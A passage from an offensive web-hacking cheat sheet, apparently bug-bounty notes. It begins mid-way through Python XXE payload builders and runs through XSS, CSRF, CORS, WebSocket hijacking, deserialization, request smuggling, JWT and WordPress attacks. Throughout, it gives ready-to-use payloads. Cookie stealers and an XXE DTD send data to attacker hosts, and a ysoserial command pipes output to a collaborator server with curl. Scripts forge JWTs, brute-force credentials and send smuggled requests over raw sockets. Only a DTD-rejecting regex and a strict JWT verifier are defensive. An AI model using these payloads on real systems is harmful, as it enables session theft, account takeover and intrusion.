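DANGEROUS = re.compile(rb"<!DOCTYPE|<!ENTITY|<xi:include", re.I)


def file_read_doc(target="/etc/passwd"):
    """In-band retrieval: a general entity expanded into a field the app echoes back."""
    return ('<?xml version="1.0" encoding="UTF-8"?>'
            '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file://%s"> ]>'
            '<stockCheck><productId>&xxe;</productId></stockCheck>' % target)


def external_dtd(target="/etc/hostname", mode="oob", attacker=ATTACKER):
    """Body of the DTD hosted on the attacker server. Inside an entity value a
    nested parameter-entity declaration must spell its '%' as &#x25;, while
    %file; stays literal: the parser expands parameter-entity references in
    external-subset literals when it reads the declaration."""
    if mode == "oob":
        inner = "<!ENTITY &#x25; exfil SYSTEM '%s/?x=%%file;'>" % attacker
        trigger = "%eval;\n%exfil;"
    elif mode == "error":
        inner = "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>"
        trigger = "%eval;\n%error;"
    else:
        raise ValueError(mode)
    return ('<!ENTITY %% file SYSTEM "file://%s">\n'
            '<!ENTITY %% eval "%s">\n'
            '%s' % (target, inner, trigger))


def blind_doc(dtd_url):
    """Document submitted to the target: loads the external DTD and triggers it."""
    return ('<?xml version="1.0" encoding="UTF-8"?>'
            '<!DOCTYPE foo [<!ENTITY %% xxe SYSTEM "%s"> %%xxe;]>'
            '<stockCheck><productId>381</productId></stockCheck>' % dtd_url)


def local_dtd_doc(local_dtd, target="/etc/passwd"):
    """Repurposing a DTD already on the server: the error-based logic nested one
    level deeper inside the internal subset, so every '%' becomes &#x25; and,
    inside the inner literal, '&' and the quote are escaped once more."""
    return ('<!DOCTYPE foo [\n'
            '<!ENTITY %% local_dtd SYSTEM "file://%s">\n'
            "<!ENTITY %% custom_entity '\n"
            '<!ENTITY &#x25; file SYSTEM "file://%s">\n'
            '<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM '
            "&#x27;file:///nonexistent/&#x25;file;&#x27;>\">\n"
            '&#x25;eval;\n&#x25;error;\n'
            "'>\n%%local_dtd;\n]>" % (local_dtd, target))


def rejects_dtd(xml_bytes):
    """Defensive check for an endpoint that never needs a DTD: refuse the document
    before parsing, in addition to disabling external entity resolution in the parser."""
    return bool(DANGEROUS.search(xml_bytes))


if __name__ == "__main__":
    print(external_dtd())
    print(blind_doc(ATTACKER + "/malicious.dtd"))
    print(local_dtd_doc("/usr/share/yelp/dtd/docbookx.dtd"))
```

The out-of-band form only carries files that fit in a URL (no newlines, short), which is why `/etc/hostname` is the usual first target; for multi-line files use the error-based variant, whose message quotes the whole expanded path.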
- Escalating XSS in PhantomJS Image Rendering to SSRF/Local-File Read
- Exploiting XSS via Markdown
- XSS to Exfiltrate Data from PDFs
- How to craft an XSS payload to create an admin user in WordPress
- xsscrapy
- For blind XSS
- AwesomeXSS
- Weaponised XSS payloads
- Cross-site scripting (XSS) cheat sheet
- XSS all the things some payloads to find XSS in various places
- JSCompress
- https://www.googleapis.com/customsearch/v1?callback=alert(document.domain)
- JSFuck
- Path Relative style sheet injection
- Shortest rXSS possible
- If Privileges are required, see if you can chain the XSS with a CSRF
- Insert a payload in the User-Agent, try with the match/replace rule
- Other endpoints: pending review comments, feedback
- Swagger-UI
  - swagger-api/swagger-ui#1262
  - swagger-api/swagger-ui#3847
  - `?url=https://raw.githubusercontent.com/seeu-inspace/easyg/main/XSS%20all%20the%20things/swag-test.json`
  - Hacking Swagger-UI - from XSS to account takeovers
  - `?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3NlZXUtaW5zcGFjZS9lYXN5Zy9tYWluL1hTUyUyMGFsbCUyMHRoZSUyMHRoaW5ncy9zd2FnLXRlc3QueWFtbCIKfQ==`
  - Nuclei template `%USERPROFILE%\nuclei-templates\exposures\apis\swagger-api.yaml`
- CRLF injection
  - `/%0D%0AX-XSS-Protection%3A%200%0A%0A%3cscript%3ealert(document.domain)%3c%2fscript%3e%3c!--`
  - `/%E5%98%8D%E5%98%8AX-XSS-Protection%3A%200%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%3cscript%3ealert(document.domain)%3c%2fscript%3e%3c!--`
  - Nuclei template `%USERPROFILE%\nuclei-templates\vulnerabilities\generic\crlf-injection.yaml`
- HTML injection
  - `<p style="color:red">ERROR! Repeat the login</p>Membership No.<br/><input><br/><a href=http://evil.com><br><input type=button value="Login"></a><br/><img src=http://evil.com style="visibility:hidden">`
  - `<div style="background-color:white;position:fixed;width:100%;height:100%;top:0px;left:0px;z-index:1000;margin: auto;padding: 10px;"><p style="color:red">ERROR! Repeat the login</p>Membership No.<br/><input><br/><a href=http://evil.com><br><input type=button value="Login"></a></div>`
- For hidden inputs: `accesskey="X" onclick="alert(1)"` then press ALT+SHIFT+X on Windows / CTRL+ALT+X on OS X
- For mobile applications: try to use as a vector the name of the phone with a payload like `"/><script>alert(1)</script>`
- XSS Without parentheses
- iframe + base64 encoded SVG
<iframe src="data:image/svg+xml;base64,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"></iframe>
- Small SVG base64
data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxyZWN0IHdpZHRoPSIxIiBoZWlnaHQ9IjEiLz48c2NyaXB0PmFsZXJ0KDEpPC9zY3JpcHQ+PC9zdmc+
- Cookie stealers
  - `fetch('https://ATTACKER-WEBSITE', {method: 'POST',mode: 'no-cors',body:document.cookie});`
  - `document.write('<img src=\"http://ATTACKER-WEBSITE/?cookie=' + document.cookie + '\" />')`
  - `<img src=x onerror=this.src='http://ATTACKER-WEBSITE/?x='+document.cookie;>`
- Unusual events: `onpointerrawupdate` (Chrome only), `onmouseleave`
- Can't use `alert`, `confirm` or `prompt`? Try `print()`! [Reference]
- This makes the page loop over requests, eventually getting blocked by a WAF and being a potential DoS: `for(;;){fetch('https://VICTIM/',{method:'GET'});}`
- `%253c%252fscript%253e%253cscript%253ealert(document.cookie)%253c%252fscript%253e`
- `<a href="jAvAsCrIpT:alert(1)">payload</a>`
- `%22%20onbeforeinput=alert(document.domain)%20contenteditable%20alt=%22`
- `1672&81782%26apos%3b%3balert(%26apos%3bXSS%26apos%3b)%2f%2f232=1`
- `<svg/onload=alert(0)>`
- `<script>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,100,111,109,97,105,110))</script>`
- `<a href=jav%26%23x61%3bscript:alert()>`
- `` data:text/javascript,console.log(3 + '\n' + `};console.log(1);//<img src=x onerror=javascript:console.log(2) oncopy=console.log(4)>`);//" onerror=console.log(5) id="x ``
- For the challenge 5Ways2XSS - DOJO #23 | YesWeHack
  - `%22-alert(document.cookie)-%22`
  - `%00%22%3E%3Cimg%20src%3da%20onerror%3dconfirm(document.domain)%3E`
XSS -> ATO Escalation [Reference]
- Change email > Password reset
- Change phone number > SMS password reset
- Add SSO (Google, Github etc.)
- Add authentication method (email, sms etc.) > Password reset
- Change password
- Change security questions
- Cross Site Tracing: If cookies are protected by the HttpOnly flag but the TRACE method is enabled, a technique called Cross Site Tracing can be used. [Reference]
- Steal Cookies
- Steal API key
- Add admin user to the application
- Hijack oAuth flow and steal code
- Steal SSO code to adjacent app, then reverse SSO back to main app
Cross-site request forgery (CSRF)
- Remove the entire token
- Use any random but same-length token, or `same-length+1` / `same-length-1`
- Use another user's token
- Change from `POST` to `GET` and delete the token
- If it's a `PUT` or `DELETE` request, try `POST /profile/update?_method=PUT` or
```http
POST /profile/update HTTP/1.1
Host: vuln.com
...

_method=PUT
```
- If the token is in a custom header, delete the header
- Change the `Content-Type` to `application/json`, `application/x-url-encoded`, `form-multipart`, `text/html` or `application/xml`
- If there is a double submit token, try CRLF injection
- Bypassing referrer check
  - If it's checked but only when it exists, add to the PoC `<meta name="referrer" content="never">`
  - Regex Referral bypass
    - https://attacker.com?victim.com
    - https://attacker.com;victim.com
    - https://attacker.com/victim.com/../victimPATH
    - https://victim.com.attacker.com
    - https://attackervictim.com
    - https://victim.com@attacker.com
    - https://attacker.com#victim.com
    - https://attacker.com\.victim.com
    - https://attacker.com/.victim.com
- CSRF token stealing via XSS/HTMLi/CORS
- JSON based
  - Change the `Content-Type` to `text/plain`, `application/x-www-form-urlencoded` or `multipart/form-data`
  - Use flash + 307 redirect
- Guessable CSRF token
- Clickjacking to strong CSRF token bypass
- Type juggling
- Use array, from `csrf=token` to `csrf[]=token`
- Set the CSRF token to null or add null bytes
- Check whether the CSRF token is sent over http or sent to a 3rd party
- Generate multiple CSRF tokens, pick the static part. Play with the dynamic part
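For the JSON-based case above, the `text/plain` trick needs the JSON split so that the form's `name=value` framing still yields a valid document. As an added example (not code from this page), the Python below builds the field pair, shows what the server decodes, renders the auto-submitting PoC and produces the `_method` override body; `vuln.com` and the endpoint are placeholders:

```python
import json
from html import escape
from urllib.parse import urlencode

# Constructed target endpoint for the PoC.
TARGET = "https://vuln.com/api/profile"


def split_json_for_form(payload, sink_key="ignore"):
    """text/plain forms send 'name=value', so split the JSON around an '=' that
    lands inside a throwaway string member: everything before it is the field
    name, the closing quote and brace are the value."""
    head = json.dumps(payload)[:-1]          # drop the closing brace
    name = '%s,"%s":"' % (head, sink_key)    # ... ,"ignore":"
    return name, '"}'                        # on the wire: ...,"ignore":"="}


def wire_body(payload, sink_key="ignore"):
    """What the browser puts on the wire for enctype=text/plain."""
    name, value = split_json_for_form(payload, sink_key)
    return name + "=" + value + "\r\n"


def parsed_wire_body(payload):
    """The JSON the server decodes from that body: the stray '=' is harmless."""
    return json.loads(wire_body(payload))


def json_csrf_poc(payload, action=TARGET):
    """Auto-submitting PoC page. Works only if the endpoint accepts or ignores a
    text/plain Content-Type and relies on cookies alone (no SameSite=Lax/Strict
    cookie, no token, no custom header requirement)."""
    name, value = split_json_for_form(payload)
    return ('<form id="f" method="POST" action="%s" enctype="text/plain">\n'
            '  <input type="hidden" name="%s" value="%s">\n'
            '</form>\n'
            '<script>document.getElementById("f").submit()</script>'
            % (escape(action, quote=True), escape(name, quote=True), escape(value, quote=True)))


def method_override_body(params, method="PUT"):
    """The _method override from the list above: a PUT/DELETE becomes a plain
    POST that a cross-site form can send."""
    return urlencode(dict(params, _method=method))


if __name__ == "__main__":
    print(wire_body({"email": "attacker@evil.com"}))
    print(json_csrf_poc({"email": "attacker@evil.com"}))
    print(method_override_body({"email": "attacker@evil.com"}))
```

A strict parser that rejects unknown members defeats the padding, so check the response to a request with an extra key first; if the endpoint also accepts `application/x-www-form-urlencoded`, the same PoC works with that enctype and no padding at all.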
Resources
Classic CORS vulnerability
```html
<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://<TARGET-URL>',true);
req.withCredentials = true;
req.send();
function reqListener() {
  alert(this.responseText);
};
</script>
```
CORS vulnerability with null origin
```html
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html,<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://<TARGET-URL>',true);
req.withCredentials = true;
req.send();
function reqListener() {
  alert(this.responseText);
};
</script>">
</iframe>
```
Resources
- Corsy Corsy is a lightweight program that scans for all known misconfigurations in CORS implementations
- What is CORS (cross-origin resource sharing)? Tutorial & Examples | Web Security Academy
Clickjacking
Classic PoC
```html
<style>
iframe {
  position:relative;
  width:$width_value;
  height: $height_value;
  opacity: $opacity;
  z-index: 2;
}
div {
  position:absolute;
  top:$top_value;
  left:$side_value;
  z-index: 1;
}
</style>
<div>Click me button</div>
<iframe src="$url"></iframe>
```
Resources
Many DOM-based vulnerabilities can be traced back to problems with the way client-side code manipulates attacker-controllable data.
- document.URL
- document.documentURI
- document.URLUnencoded
- document.baseURI
- location
- document.cookie
- document.referrer
- window.name
- history.pushState
- history.replaceState
- localStorage
- sessionStorage
- IndexedDB (mozIndexedDB, webkitIndexedDB, msIndexedDB)
- Database
| DOM-based vulnerability | Example sink |
|---|---|
| DOM XSS | `document.write()` |
| Open redirection | `window.location` |
| Cookie manipulation | `document.cookie` |
| JavaScript injection | `eval()` |
| Document-domain manipulation | `document.domain` |
| WebSocket-URL poisoning | `WebSocket()` |
| Link manipulation | `someElement.src` |
| Web-message manipulation | `postMessage()` |
| Ajax request-header manipulation | `setRequestHeader()` |
| Local file-path manipulation | `FileReader.readAsText()` |
| Client-side SQL injection | `ExecuteSql()` |
| HTML5-storage manipulation | `sessionStorage.setItem()` |
| Client-side XPath injection | `document.evaluate()` |
| Client-side JSON injection | `JSON.parse()` |
| DOM-data manipulation | `someElement.setAttribute()` |
| Denial of service | `RegExp()` |
Any web security vulnerability might arise in relation to WebSockets:
- User-supplied input transmitted to the server might be processed in unsafe ways, leading to vulnerabilities such as SQL injection or XML external entity injection;
- Some blind vulnerabilities reached via WebSockets might only be detectable using out-of-band (OAST) techniques;
- If attacker-controlled data is transmitted via WebSockets to other application users, then it might lead to XSS or other client-side vulnerabilities.
Cross-site WebSocket hijacking (CSRF missing)
```html
<script>
websocket = new WebSocket('wss://websocket-URL');
websocket.onopen = start;
websocket.onmessage = handleReply;
function start(event) {
  websocket.send("READY");
}
function handleReply(event) {
  fetch('https://your-domain/?'+event.data, {mode: 'no-cors'});
}
</script>
```
How to spot Insecure deserialization
- PHP example: `O:4:"User":2:{s:4:"name";s:6:"carlos";s:10:"isLoggedIn";b:1;}`
- Java objects always begin with the same bytes
  - Hex: `ac ed`
  - Base64: `rO0`
- .NET vulnerable deserialization libraries: BinaryFormatter, SoapFormatter, NetDataContractSerializer, LosFormatter, ObjectStateFormatter
- BinaryFormatter serialized objects usually start with `AAEAAAD`
Ysoserial
Because of `Runtime.exec()`, ysoserial doesn't work well with multiple commands. After some research, I found a way to run multiple sys commands anyway, by using `sh -c $@|sh . echo` before the multiple commands that we need to run. Here I needed to run the commands `host` and `whoami`:
```bash
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections7 'sh -c $@|sh . echo host $(whoami).<MY-RATOR-ID>.burpcollaborator.net' | gzip | base64
```
Other options
```bash
java --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.trax=ALL-UNNAMED --add-opens=java.xml/com.sun.org.apache.xalan.internal.xsltc.runtime=ALL-UNNAMED --add-opens java.base/java.net=ALL-UNNAMED --add-opens=java.base/java.util=ALL-UNNAMED -jar ysoserial-all.jar CommonsCollections4 "id"
```
- See this
Ysoserial.net
Windows Defender might tag the application as a virus.
```powershell
.\ysoserial.exe -g ClaimsPrincipal -f BinaryFormatter -c 'whoami | curl --data-binary @- http://yourcollaboratorserver' -bgc ActivitySurrogateDisableTypeCheck --minify --ust
```
PHPGGC
PHPGGC is a library of unserialize() payloads along with a tool to generate them, from command line or programmatically.
Burp extensions
- Java Deserialization Scanner
- Java Serialized Payloads
- GadgetProbe
- Freddy, Deserialization Bug Finder
- PHP Object Injection Check
Server-side template injection
- Try fuzzing the template by injecting a sequence of special characters commonly used in template expressions, such as `${{<%[%'"}}%\`. To identify the template engine, submit invalid syntax to cause an error message.
- The next step is to look at the documentation to see how you can exploit the vulnerable endpoints and known vulnerabilities/exploits.
- Use payloads like these: `{{7*7}}`, `[[3*3]]`, `{{7*'7'}}`, `<%= 7 * 7 %>`, `${7*7}`, `${{7*7}}`, `@(7+7)`, `#{7*7}`, `#{ 7 * 7 }`
Constructing a web cache poisoning attack
- Identify and evaluate unkeyed inputs
- Elicit a harmful response from the back-end server
- Get the response cached
Cache key flaws
Many websites and CDNs perform various transformations on keyed components when they are saved in the cache key:
- Excluding the query string
- Filtering out specific query parameters
- Normalizing input in keyed components
Cache probing methodology
- Identify a suitable cache oracle
- Simply a page or endpoint that provides feedback about the cache's behavior. This feedback could take various forms, such as: An HTTP header that explicitly tells you whether you got a cache hit, Observable changes to dynamic content, Distinct response times
- Probe key handling
- Is anything being excluded from a keyed component when it is added to the cache key? Common examples are excluding specific query parameters, or even the entire query string, and removing the port from the Host header.
- Identify an exploitable gadget
- These techniques enable you to exploit a number of unclassified vulnerabilities that are often dismissed as "unexploitable" and left unpatched.
- "If someone sends a cookie called '0', automattic.com responds with a list of all 152 cookies supported by the application: curl -v -H 'Cookie: 0=1' https://automattic.com/?cb=123 | fgrep Cookie" [Reference];
- Carriage Return Line Feed (CRLF) injection: "When you find response header injection, you can probably do better than mere XSS or open-redir. Try injecting a short Content-Length header to cause a reverse desync and exploit random live users." [Reference]
HTTP request smuggling
Most HTTP request smuggling vulnerabilities arise because the HTTP specification provides two different ways to specify where a request ends:
- Content-Length
```http
POST /search HTTP/1.1
Host: normal-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

q=smuggling
```
- Transfer-Encoding
```http
POST /search HTTP/1.1
Host: normal-website.com
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked

b
q=smuggling
0

```
Example
```http
POST / HTTP/1.1
Host: smuggle-vulnerable.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked

0

G
```
Result: GPOST request
- Some servers do not support the Transfer-Encoding header in requests;
- Some servers that do support the Transfer-Encoding header can be induced not to process it if the header is obfuscated in some way.
Ways to obfuscate the Transfer-Encoding header
```
Transfer-Encoding: xchunked
Transfer-Encoding : chunked
Transfer-Encoding: chunked
Transfer-Encoding: x
Transfer-Encoding:[tab]chunked
[space]Transfer-Encoding: chunked
X: X[\n]Transfer-Encoding: chunked
Transfer-Encoding
: chunked
```
Confirming CL.TE vulnerabilities using differential responses
```http
POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 49
Transfer-Encoding: chunked

e
q=smuggling&x=
0

GET /404 HTTP/1.1
Foo: x
```
Result
```http
GET /404 HTTP/1.1
Foo: xPOST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

q=smuggling
```
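To see why the request above desyncs the two servers, the Python below (an added example, not code from this page) builds it with the Content-Length computed rather than hand-counted, then parses the same bytes once by Content-Length and once by chunked encoding to show the leftover that gets prepended to the next user's request; `vulnerable-website.com` is the placeholder from the example and `send_raw` is only needed against a live target:

```python
import socket
import ssl

HOST = "vulnerable-website.com"  # constructed target name from the example above


def cl_te_probe(smuggled, host=HOST, path="/search"):
    """Raw CL.TE request: the chunked body ends after the "0" chunk, the smuggled
    bytes follow it, and Content-Length covers everything so a front end that
    honours Content-Length forwards the whole thing as one request."""
    body = b"e\r\nq=smuggling&x=\r\n0\r\n\r\n" + smuggled
    head = (b"POST %s HTTP/1.1\r\nHost: %s\r\n"
            b"Content-Type: application/x-www-form-urlencoded\r\n"
            b"Content-Length: %d\r\nTransfer-Encoding: chunked\r\n\r\n"
            % (path.encode(), host.encode(), len(body)))
    return head + body


def split_by_content_length(data):
    """Front-end view: headers plus exactly Content-Length body bytes; whatever
    remains would be treated as the next request on the connection."""
    head, _, rest = data.partition(b"\r\n\r\n")
    length = 0
    for line in head.split(b"\r\n"):
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length":
            length = int(value.strip())
    return head + b"\r\n\r\n" + rest[:length], rest[length:]


def split_by_chunked(data):
    """Back-end view: consume chunks until the zero-size chunk; the rest stays
    on the connection and is glued onto the next request that arrives."""
    head, _, rest = data.partition(b"\r\n\r\n")
    pos, body = 0, b""
    while True:
        line_end = rest.index(b"\r\n", pos)
        size = int(rest[pos:line_end], 16)
        pos = line_end + 2
        if size == 0:
            pos += 2  # blank line that terminates the chunked body
            break
        body += rest[pos:pos + size]
        pos += size + 2
    return head + b"\r\n\r\n" + body, rest[pos:]


def send_raw(host, port, data, use_tls=True, timeout=10):
    """Send the bytes exactly as built (HTTP libraries normalise or drop the
    conflicting headers) and return whatever comes back before the timeout."""
    sock = socket.create_connection((host, port), timeout=timeout)
    if use_tls:
        sock = ssl.create_default_context().wrap_socket(sock, server_hostname=host)
    with sock:
        sock.sendall(data)
        chunks = []
        try:
            while True:
                part = sock.recv(4096)
                if not part:
                    break
                chunks.append(part)
        except socket.timeout:
            pass
    return b"".join(chunks)


if __name__ == "__main__":
    req = cl_te_probe(b"GET /404 HTTP/1.1\r\nFoo: x")
    print(req.decode())
    print("front end leftover:", split_by_content_length(req)[1])
    print("back end leftover: ", split_by_chunked(req)[1])
```

Send the probe twice in quick succession: the first response is normal, the second (or a victim's request arriving in between) gets the smuggled `GET /404` prefix and answers with a 404, which is the differential response the section title refers to.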
Impact
- Bypass front-end security controls
- Revealing front-end request rewriting
- Capturing other users' requests
- Using HTTP request smuggling to exploit reflected XSS
- Turn an on-site redirect into an open redirect
Example of 301 in Apache and IIS web servers. Vulnerable request and response:
```http
GET /home HTTP/1.1
Host: normal-website.com

HTTP/1.1 301 Moved Permanently
Location: https://normal-website.com/home/
```
Attack:
```http
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 54
Transfer-Encoding: chunked

0

GET /home HTTP/1.1
Host: attacker-website.com
Foo: X
```
Result:
```http
GET /home HTTP/1.1
Host: attacker-website.com
Foo: XGET /scripts/include.js HTTP/1.1
Host: vulnerable-website.com

HTTP/1.1 301 Moved Permanently
Location: https://attacker-website.com/home/
```
- Perform web cache poisoning
- Perform web cache deception
Resource
JWT Attacks
A JWT consists of a `header`, a `payload`, and a `signature`. Each part is separated by a dot.
Common attacks
- Accepting tokens with no signature
- Brute-forcing secret keys using hashcat
  - You need a valid JWT and a wordlist: `hashcat -a 0 -m 16500 <jwt> <wordlist>`
  - If any of the signatures match, hashcat will give you an output like `<jwt>:<identified-secret>` along with other details
  - Once you have identified the secret key, you can use it to generate a valid signature for any JWT header and payload that you like. See Signing JWTs
- Injecting self-signed JWTs via the `jwk`, `jku` or `kid` parameter
- Change Content-Type in `cty` to achieve XXE and deserialization attacks
- `x5c` (X.509 Certificate Chain) can lead to CVE-2017-2800 and CVE-2018-2633
- JWT algorithm confusion
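The hashcat step above can be reproduced offline. As an added example (not code from this page), the Python below signs an HS256 token with a constructed secret, recovers that secret from a wordlist the way `-m 16500` does, forges a token with altered claims, builds the unsigned `alg=none` variant, and shows a verifier that pins the algorithm so neither trick works against it:

```python
import base64
import hashlib
import hmac
import json


def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _encode_part(obj):
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(header, payload, secret):
    """base64url(header).base64url(payload).base64url(HMAC-SHA256(secret, first two))"""
    signing_input = _encode_part(header) + "." + _encode_part(payload)
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def crack_hs256(token, wordlist):
    """Offline equivalent of hashcat -m 16500: recompute the HMAC for every
    candidate secret and compare it with the token's signature."""
    signing_input, _, sig = token.rpartition(".")
    target = b64url_decode(sig)
    for candidate in wordlist:
        guess = hmac.new(candidate.encode(), signing_input.encode(), hashlib.sha256).digest()
        if hmac.compare_digest(guess, target):
            return candidate
    return None


def unsigned_token(payload):
    """alg=none form for servers that accept tokens with no signature:
    header.payload. with an empty third segment."""
    return _encode_part({"alg": "none", "typ": "JWT"}) + "." + _encode_part(payload) + "."


def decode_claims(token):
    """Claims without any verification, as a client-side decoder shows them."""
    return json.loads(b64url_decode(token.split(".")[1]))


def verify_hs256(token, secret):
    """Server side done right: the expected algorithm is fixed by the verifier,
    not read from the header, and the comparison is constant-time. Returns the
    claims or None."""
    try:
        h, p, s = token.split(".")
    except ValueError:
        return None
    if json.loads(b64url_decode(h)).get("alg") != "HS256":
        return None
    expected = hmac.new(secret.encode(), (h + "." + p).encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        return None
    return json.loads(b64url_decode(p))


if __name__ == "__main__":
    # Constructed token and wordlist.
    token = sign_hs256({"alg": "HS256", "typ": "JWT"}, {"sub": "wiener", "admin": False}, "secret1")
    found = crack_hs256(token, ["password", "123456", "secret1", "qwerty"])
    print("secret:", found)
    print("forged:", sign_hs256({"alg": "HS256", "typ": "JWT"}, {"sub": "administrator", "admin": True}, found))
    print("none  :", unsigned_token({"sub": "administrator"}))
```

A pure-Python loop is slow next to hashcat, so use it to confirm a hit or for short lists; the forged token is what you paste back into the session cookie or Authorization header.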
Resources
OAuth authentication
How OAuth 2.0 works:
- Client application: the website or web application that wants to access the user's data
- Resource owner: the user whose data the client application wants to access
- OAuth service provider: the website or application that controls the user's data and access to it. They support OAuth by providing an API for interacting with both an authorization server and a resource server.
Following standard endpoints:
/.well-known/oauth-authorization-server
/.well-known/openid-configuration
Vulnerabilities in the client application
- Improper implementation of the implicit grant type
- Flawed CSRF protection
Vulnerabilities in the OAuth service
- Leaking authorization codes and access tokens
- Flawed scope validation
- Unverified user registration
GraphQL
To analyze the schema: ivangoncharov.github.io/graphql-voyager/ or InQL for Burp Suite.
GraphQL Introspection query
```json
{"query": "{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}"}
```
Raw (non-JSON) variant of the same query:
```graphql
{query: __schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on __Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on __InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on __Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}
```
Variant with `operationName` and a multi-line query string:
```json
{"operationName":"IntrospectionQuery","variables":{},"query":"query IntrospectionQuery {\n __schema {\n queryType {\n name\n }\n mutationType {\n name\n }\n subscriptionType {\n name\n }\n types {\n ...FullType\n }\n directives {\n name\n description\n locations\n args {\n ...InputValue\n }\n }\n }\n}\n\nfragment FullType on __Type {\n kind\n name\n description\n fields(includeDeprecated: true) {\n name\n description\n args {\n ...InputValue\n }\n type {\n ...TypeRef\n }\n isDeprecated\n deprecationReason\n }\n inputFields {\n ...InputValue\n }\n interfaces {\n ...TypeRef\n }\n enumValues(includeDeprecated: true) {\n name\n description\n isDeprecated\n deprecationReason\n }\n possibleTypes {\n ...TypeRef\n }\n}\n\nfragment InputValue on __InputValue {\n name\n description\n type {\n ...TypeRef\n }\n defaultValue\n}\n\nfragment TypeRef on __Type {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n }\n }\n }\n }\n }\n }\n }\n}\n"}
```
- Information Disclosure [high]:
/_wpeprivate/config.json
- Data exposure:
/wp-json/wp/v2/users/
/wp-json/th/v1/user_generation
/?rest_route=/wp/v2/users
- xmlrpc.php enabled, reference. Send a POST request to this endpoint with a body like this:
```xml
<?xml version="1.0" encoding="utf-8"?>
<methodCall>
  <methodName>system.listMethods</methodName>
  <params></params>
</methodCall>
```
- Use Nuclei to detect WordPress websites from a list of targets with `nuclei -l subdomains.txt -t %USERPROFILE%/nuclei-templates/technologies/wordpress-detect.yaml`
- Scan with WPScan (github.com/wpscanteam/wpscan):
  - `wpscan --url <domain> --enumerate u` enumerate users
  - `wpscan --url <domain> -U users.txt -P password.txt` try to find valid credentials
  - `wpscan --url <domain> --api-token <your-api-token>`
  - `wpscan --url <target> --enumerate p --plugins-detection aggressive -o results`
  - `wpscan --url https://example[.]com --api-token <api token> --plugins-detection mixed -e vp,vt,cb,dbe,u1-10 --force` [source]
- Nuclei templates: `%USERPROFILE%\nuclei-templates\vulnerabilities\wordpress`
Resources
- https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/WordPress.md
- https://www.rcesecurity.com/2022/07/WordPress-Transposh-Exploiting-a-Blind-SQL-Injection-via-XSS/
- WordPress Checklist
- Check if `trace.axd` is enabled
- Search for `Views/web.config`, `bin/WebApplication1.dll`, `System.Web.Mvc.dll`, `System.Web.Mvc.Ajax.dll`, `System.Web.Mvc.Html.dll`, `System.Web.Optimization.dll`, `System.Web.Routing.dll`
- Other common files
Resources
- https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/iis-internet-information-services
- Wordlist iisfinal.txt
- Find Lotus Domino with nuclei: `%USERPROFILE%\nuclei-templates\technologies\lotus-domino-version.yaml`
- Exploit DB: Lotus-Domino
- Fuzzing list: SecLists/LotusNotes.fuzz.txt
Once you have the source code, look for the secrets within the files. To find secrets, you can use trufflehog.
Other tools
- DotGit, find if a website has `.git` exposed
- nuclei template `%USERPROFILE%\nuclei-templates\exposures\configs\git-config.yaml`
- GitDumper from GitTools
Tools
- Can I take over XYZ?
- nuclei template `%USERPROFILE%\nuclei-templates\takeovers`
- byp4xx, s/o to m0pam for the tip
- Search for subdomains with subfinder. httpx keeps the subdomains that answer 403 and prints their CNAME; test the CNAME for a bypass (s/o to drak3hft7 for the tip): `subfinder -d atg.se --silent | httpx -sc -mc 403 -cname`
- 403 Bypasser Burp extension, test 403 bypasses on the run
- Replace `HTTP/n` with `HTTP/1.1`, `HTTP/2` or `HTTP/3`
- Change the request from `GET` to `POST` or vice versa
- If the application gives the possibility to download data, try to download too much data
- If there are restrictions, try to bypass
